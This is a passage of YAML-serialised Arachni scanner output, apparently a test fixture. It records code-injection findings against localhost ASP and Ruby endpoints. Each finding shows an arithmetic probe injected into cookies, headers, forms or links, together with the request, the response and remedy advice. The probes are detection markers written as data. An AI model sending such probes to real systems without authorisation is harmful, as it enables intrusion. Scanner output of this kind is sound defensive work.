  - injection
  - regexp
  url: http://localhost:11414/asp/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=%3BResponse.Write(287630581954%2B4196403186331128);cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;Response.Write(287630581954+4196403186331128)
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;Response.Write(287630581954+4196403186331128)
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: ;Response.Write(287630581954+4196403186331128)
      :injected: ;Response.Write(287630581954+4196403186331128)
      :combo: 
        cookie: ;Response.Write(287630581954+4196403186331128)
      :action: http://localhost:11414/asp/cookie/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/asp/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: cookie
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/asp/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value%3BResponse.Write(287630581954%2B4196403186331128)
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: cookie value;Response.Write(287630581954+4196403186331128)
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;Response.Write(287630581954+4196403186331128)
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value;Response.Write(287630581954+4196403186331128)
      :injected: cookie value;Response.Write(287630581954+4196403186331128)
      :combo: 
        cookie2: cookie value;Response.Write(287630581954+4196403186331128)
      :action: http://localhost:11414/asp/cookie/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/asp/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: header
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/asp/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: ;Response.Write(287630581954+4196403186331128)
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;Response.Write(287630581954+4196403186331128)
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;Response.Write(287630581954+4196403186331128)
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: ;Response.Write(287630581954+4196403186331128)
      :injected: ;Response.Write(287630581954+4196403186331128)
      :combo: 
        User-Agent: ;Response.Write(287630581954+4196403186331128)
      :action: http://localhost:11414/asp/header/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/asp/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: header
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/asp/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;Response.Write(287630581954+4196403186331128)
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: arachni_user;Response.Write(287630581954+4196403186331128)
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;Response.Write(287630581954+4196403186331128)
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;Response.Write(287630581954+4196403186331128)
      :injected: arachni_user;Response.Write(287630581954+4196403186331128)
      :combo: 
        User-Agent: arachni_user;Response.Write(287630581954+4196403186331128)
      :action: http://localhost:11414/asp/header/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/asp/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: form
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/ruby/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;puts 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;puts 287630581954+4196403186331128
      :altered: input
      :element: form
      :params: 
        input: ;puts 287630581954+4196403186331128
      :follow_location: true
      :injected: ;puts 287630581954+4196403186331128
      :combo: 
        input: ;puts 287630581954+4196403186331128
      :action: http://localhost:11414/ruby/form/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/ruby/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: form
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/ruby/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: default;puts 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;puts 287630581954+4196403186331128
      :altered: input
      :element: form
      :params: 
        input: default;puts 287630581954+4196403186331128
      :follow_location: true
      :injected: default;puts 287630581954+4196403186331128
      :combo: 
        input: default;puts 287630581954+4196403186331128
      :action: http://localhost:11414/ruby/form/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/ruby/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: link
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/ruby/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;puts 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;puts 287630581954+4196403186331128
      :altered: input
      :element: link
      :params: 
        input: ;puts 287630581954+4196403186331128
      :follow_location: true
      :injected: ;puts 287630581954+4196403186331128
      :combo: 
        input: ;puts 287630581954+4196403186331128
      :action: http://localhost:11414/ruby/link/straight?input=default
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/ruby/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: link
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/ruby/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: default;puts 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;puts 287630581954+4196403186331128
      :altered: input
      :element: link
      :params: 
        input: default;puts 287630581954+4196403186331128
      :follow_location: true
      :injected: default;puts 287630581954+4196403186331128
      :combo: 
        input: default;puts 287630581954+4196403186331128
      :action: http://localhost:11414/ruby/link/append?input=default
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/ruby/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: cookie
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/ruby/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=%3Bputs+287630581954%2B4196403186331128;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;puts 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;puts 287630581954+4196403186331128
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: ;puts 287630581954+4196403186331128
      :injected: ;puts 287630581954+4196403186331128
      :combo: 
        cookie: ;puts 287630581954+4196403186331128
      :action: http://localhost:11414/ruby/cookie/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/ruby/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: cookie
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/ruby/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value%3Bputs+287630581954%2B4196403186331128
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: cookie value;puts 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;puts 287630581954+4196403186331128
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value;puts 287630581954+4196403186331128
      :injected: cookie value;puts 287630581954+4196403186331128
      :combo: 
        cookie2: cookie value;puts 287630581954+4196403186331128
      :action: http://localhost:11414/ruby/cookie/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/ruby/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: header
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
